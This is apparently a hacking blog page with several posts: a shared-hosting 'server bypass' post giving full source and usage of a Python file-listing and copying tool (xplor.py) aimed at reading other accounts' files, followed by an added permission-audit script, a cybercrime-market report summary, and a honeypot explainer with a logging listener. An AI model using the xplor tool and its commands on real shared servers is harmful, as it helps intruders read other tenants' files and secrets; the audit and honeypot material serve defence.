Showing posts with label Service. Show all posts
May 22, 2012

Server Bypass via Symlink - Jumping in server Part 2

Let's continue with the next method of symlink server bypassing. As you saw in the previous post, there is more than one way to do it; now I will explain a new trick with another tool.
http://www.flashcrew.in/2012/05/server-bypass-via-symlink-jumping-in.html

-------------------------
Here we will talk about another tool, which uses Python's permissions to read other folders/files on the same server.
The tool is called xplor.py, and here is the source:

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
    if not hasattr(source, 'read'):
        source = open(source, 'rb')
    if not hasattr(dest, 'write'):
        dest = open(dest, 'wb')
    while 1:
        copy_buffer = source.read(buffer_size)
        if copy_buffer:
            dest.write(copy_buffer)
        else:
            break
    source.close()
    dest.close()

if __name__=="__main__":
    if not len(sys.argv) == 3 and not len(sys.argv) == 2:
        sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
        sys.exit(1)
   
    target = sys.argv[1].replace("\\","/")
    if os.path.isdir(target):
        if not target.endswith("/"):
            target = target + "/"
        dir = os.listdir(target)
        for d in dir:
            fs = ""
            if os.path.isdir(target + d):
                fs = "[ DIR ]"
            elif os.path.isfile(target + d):
                fs = os.path.getsize(target + d)
                fs = str(fs)
               
            sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
    elif os.path.isfile(target):
        if len(sys.argv) == 3:
            copyfile(target, sys.argv[2])
        else:
            f = open(target, "rb")
            try:
                byte = f.read(1024)
                sys.stdout.write(byte)
                sys.stdout.flush()
                while byte != "":
                    byte = f.read(1024)
                    sys.stdout.write(byte)
                    sys.stdout.flush()
            finally:
                f.close()
    else:
        sys.stdout.write("Can't found file or folder : " + target)

http://pastebin.com/WqmCE2sJ

Testing the script: python xplor.py

Use the tool to view folders that you do not have any permission to read:

python xplor.py /var/www/index.php


View the files in a no-access folder:
python xplor.py /var/www/index.php


Copy/save your file:
python xplor.py /var/www/indro/ketek.jpg ketek.jpg

And yes, the file is here.

Yeah, fucking access is granted.


You can do the same thing with these other scripts in Perl:
webs.pl
and
xplor.pl


enjoy it :)
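
xplor.py calls nothing beyond os.listdir() and open(), so it only succeeds where the Unix permission bits already let the account running the interpreter list or read a path. The audit below is an added example for administrators of shared hosts, not code from the original post; the function names and the report wording are assumptions. It reports every entry under a tree that other local accounts can list, traverse or read, plus symlinks that resolve outside the tree.

```python
import os
import stat

def classify(path, root):
    """Return a finding for `path`, or None if other accounts cannot use it."""
    st = os.lstat(path)                      # lstat: inspect the link, not its target
    mode = stat.S_IMODE(st.st_mode)
    if stat.S_ISLNK(st.st_mode):
        target = os.path.realpath(path)
        if os.path.commonpath([target, root]) != root:
            return "symlink leaves tree -> " + target
        return None
    if stat.S_ISDIR(st.st_mode):
        if mode & stat.S_IROTH:
            return "dir listable by others (%04o)" % mode
        if mode & stat.S_IXOTH:
            return "dir traversable by others (%04o)" % mode
        return None
    if stat.S_ISREG(st.st_mode) and mode & stat.S_IROTH:
        return "file readable by others (%04o)" % mode
    return None

def audit_tree(root):
    """Map each exposed path (relative to root) to the reason it is exposed."""
    root = os.path.realpath(root)
    paths = [root]
    for dirpath, dirnames, filenames in os.walk(root):   # does not follow symlinks
        paths += [os.path.join(dirpath, n) for n in dirnames + filenames]
    findings = {}
    for p in paths:
        reason = classify(p, root)
        if reason:
            findings[os.path.relpath(p, root)] = reason
    return findings

if __name__ == "__main__":
    import sys
    for rel, reason in sorted(audit_tree(sys.argv[1]).items()):
        print(reason.ljust(40), rel)
```

Run it against each account's home or web root; entries it reports are the ones a per-user script on the same box could reach, so tighten them to owner (or owner plus web-server group) access.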
Apr 25, 2012

Russian cybercrime market doubles in size

Russian cybercrime investigation and computer forensics company and LETA Group subsidiary Group-IB released a 28-page report prepared by analysts from its computer forensics lab and its CERT-GIB unit on the Russian cybercrime market in 2011.

The report outlines the main risks associated with various types of hacker activities, analyzes the main trends in the development of the Russian cybercrime market, estimates the shares and the financial performance of the Russian segment of the global cybercrime market, and forecasts market trends for this year.

Key trends in 2011:

Russian cybercrime doubles
The global cybercrime market was more than $12.5 billion in 2011. The global Russian speaking component of that market was more than $4 billion; and the Russian national cybercrime market was $2.3 billion, essentially doubling last year's number of $1.2 billion.

Mafia professionalizes Russian cybercrime
Traditional crime syndicates are beginning to organize the previously disorganized Russian cybercrime market. In addition, these crime syndicates are beginning to work more closely together, sharing compromised data, botnets, and cashing schemes.

Online fraud and spam account for more than half of Russian cybercrime
In 2011, the largest type of Russian cybercrime was online fraud at $942 million; followed by spam at $830 million; cybercrime to cybercrime, or C2C (including services for anonymization and sale of traffic, exploits, malware, and loaders) at $230 million; and DDoS at $130 million.

Criminal profiles
In its report, Group-IB specialists and CERT-GIB analysts profile details of 5 cyber criminals caught in 2011: Vladislav Khorokhorin, Oleg Nikolayenko, Yevgeniy Anikin, Maksim Glotov, Andrey Sabelikov.

Group-IB suggests that Russian laws are critical in getting traction against the global Russian cybercrime market. Although they feel there has been progress with recent laws introduced by Russian President Dmitriy Medvedev and enacted by the Russian State Duma, these laws do not yet go far enough.

The report also recommends steps that will significantly improve the number of solved computer crimes, change the existing law enforcement practices, and establish proper international cooperation in this field.

These recommendations include:
  • Clarify language of new laws - Amend the law with an additional conceptual apparatus related to issues of information security and information technologies. For example, the term "botnet" needs to be introduced, perhaps under a different name, which remains and will remain for the foreseeable future the main tool for committing the majority of cybercrimes. In addition, change the term "computer information" in the existing law, which does not fully reflect the nature of computer information, leading to possible incorrect interpretations of this term.
  • Increase penalties - Make the penalties for crimes committed using computer technologies more severe.
  • Update, amend and augment criminal procedures - Create more effective criminal procedures around gathering "digital evidence" such as describing the procedures and actions related to procuring, securing, and investigating; and creating a separate definition for the crime scene of a cybercrime and establish a specific place of investigation of such crimes.
  • Improve law enforcement - Organize federal and regional training programs for the judicial, prosecutorial, investigative, and law enforcement agencies, including seminars regarding the issues of cybercrime investigation.
  • Improve international coordination - Develop a document for submission to the UN, establishing the principles of international interaction against cybercrime, while also respecting the sovereignty of the member states, as opposed to the Budapest Convention.
Resource: net-security.org
May 29, 2011

HONEY POT: Hack Hackers

What is a honeypot?
In layman's terms, it is a trap set by administrators for hackers, to fool them or make them believe that they are hacking into the admin's system, when instead the hackers are getting hacked by the admin.

How does this work?

It works by presenting hackers with a false scenario in which the hacker thinks he is penetrating the system, but is in fact going nowhere and is only playing in a world created by the admins. By doing so, admins are able to check all the malicious activity of the hackers, such as which ports they are trying to connect to, what files they are trying to upload, and which sections they are trying to access.

A honeypot is mainly designed to trap hackers, or to present hackers with a virtual system that never exists.

Technically, a honeypot tries to listen on all the ports of the system. Whenever a hacker port scans the system, he gets a list of ports he thinks are open, but they are actually ports opened and shown by the honeypot behind the firewall. So whenever the hacker tries to access some random port, say 100, he is accessing the honeypot, not the system.

The above scenario can be visualised better: install VMware on a system, run any old version of Windows or Linux on it with all ports open, and port forward those ports on the host system. Whenever a hacker tries to fingerprint or port scan, he will be getting information about the VMware guest, not the host system. The hacker may be able to penetrate the VMware OS, but our host OS remains safe.

But there are many difficulties in doing the above job, so a special application called a honeypot was created to do this job and many others, like tracking packets, file access etc.

There are mainly 3 types of honeypots available:
1. Small: Mainly keeps a log of the IP addresses that are trying to access your system, along with the port.
2. Medium: Its functionality is a little more advanced, keeping track of files accessed, time period, hosts etc.
3. Large: It provides all the functionality, but the main feature of this kind of honeypot is security; it can simulate a virtual OS for outsiders or hackers very well.


In this article I am going to give an example of a small-scale honeypot for Windows.
Honeypots are available both commercially and as open source; I am taking the example of KFSensor, which is freely available here.
STEP 1: Download KFSensor and WinPcap from their websites and install them.
STEP 2: Restart your system, then start the WinPcap server from the folder menu where it is saved, mainly on the C:\ drive.
STEP 3: Start KFSensor and do as prompted in the window; this is mainly for configuring your new honeypot.
STEP 4: Done. Keep your system up for packet scanning.




In the above picture you can see that some port numbers are struck out. This is because you need to restart the system, then start your honeypot, and only then start the internet connection; otherwise these ports will be used by the net connection first, the honeypot will not be able to access them, and no information gathering will be possible.
======================================================================
We can also create our own small honeypot whose main function is to check for incoming packets.
It is nothing but a basic client-server program which listens on all ports.

Within minutes of installation of this small honeypot I got the scanning alert sound; when checked, these were UDP packets, mainly left over the internet for scanning of hosts.
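
The "basic client-server program" described above, as an added example that is not the original author's program: a Python listener covering only the "Small" type from the list (it logs source address, destination port and the first bytes of each TCP connection, and never replies). The port list and function names are assumptions.

```python
import selectors
import socket
import time

def open_listeners(host, ports):
    """Bind one listening TCP socket per port (port 0 = let the OS pick one)."""
    sel = selectors.DefaultSelector()
    bound = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((host, port))
        s.listen(16)
        s.setblocking(False)
        sel.register(s, selectors.EVENT_READ)
        bound.append(s.getsockname()[1])
    return sel, bound

def collect(sel, duration, max_bytes=256):
    """Accept connections for `duration` seconds; return one record per hit."""
    log = []
    deadline = time.monotonic() + duration
    while (left := deadline - time.monotonic()) > 0:
        for key, _ in sel.select(timeout=left):
            try:
                conn, (src_ip, src_port) = key.fileobj.accept()
            except BlockingIOError:
                continue
            with conn:
                conn.settimeout(0.5)
                try:
                    first = conn.recv(max_bytes)  # record what was sent, never reply
                except OSError:                   # timeout or reset: nothing sent
                    first = b""
            log.append({"time": time.time(), "src_ip": src_ip, "src_port": src_port,
                        "dst_port": key.fileobj.getsockname()[1], "first_bytes": first})
    return log

if __name__ == "__main__":
    # Constructed port list; ports under 1024 need elevated rights on Unix-like systems.
    sel, ports = open_listeners("0.0.0.0", [2323, 8081, 3390])
    print("listening on", ports)
    while True:
        for rec in collect(sel, 5.0):
            print(rec)
```

As the post notes for KFSensor, a port already held by another service cannot be bound, so start the listener before anything else claims the ports you want to watch.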
May 15, 2011

Online Penetration Tools For Scanning Various Services

subhashdasyam.com released a bunch of online security tools to scan various services and protocols. These could be a great help if you want to use your mobile phone or handheld. However, they are not intended to replace real good scanners or manual techniques. Some scanners are still buggy and can lead you to misinterpretation, so use them with care.

Available Scanners

More Info Click Here

Please donate for his hard work :) I think these are useful free services.
 
FlashcRew Blog